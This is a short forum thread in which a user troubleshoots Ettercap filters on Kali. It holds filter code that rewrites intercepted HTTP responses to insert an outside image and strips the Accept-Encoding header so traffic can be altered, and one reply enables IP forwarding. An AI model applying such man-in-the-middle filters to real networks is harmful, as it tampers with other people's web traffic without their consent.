Jump to content

Ettercap filters


Recommended Posts

Here is the filter I'm using: 

if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.cranklin.com/mickey.png\" ");
replace("IMG SRC=", "img src=\"http://www.cranklin.com/mickey.png\" ");
msg("Filter Ran.\n");

Everything seems to be working fine and no errors are popping up but when I go onto the internet on my host computer nothing seems to change.

Link to comment
Share on other sites

Thank you for the response but if you're referring to including this line of code 

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");

I got the same results. Perhaps I should include more details. I'm running Kali, My ettercap is version 0.8.2, ip_forwarding is set to 1 and ettercap, when I run this code, tells me the filter has run however, no changes occur to the target computer. Any ideas on what the problem could be?

Link to comment
Share on other sites

If the traffic is encrypted with ssl or hsts it wont work.


Try using internet explorer and try multiple websites that are not encrypted.


Ip forwarding like this?

 echo 1 > /proc/sys/net/ipv4/ip_forward
Edited by i8igmac
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...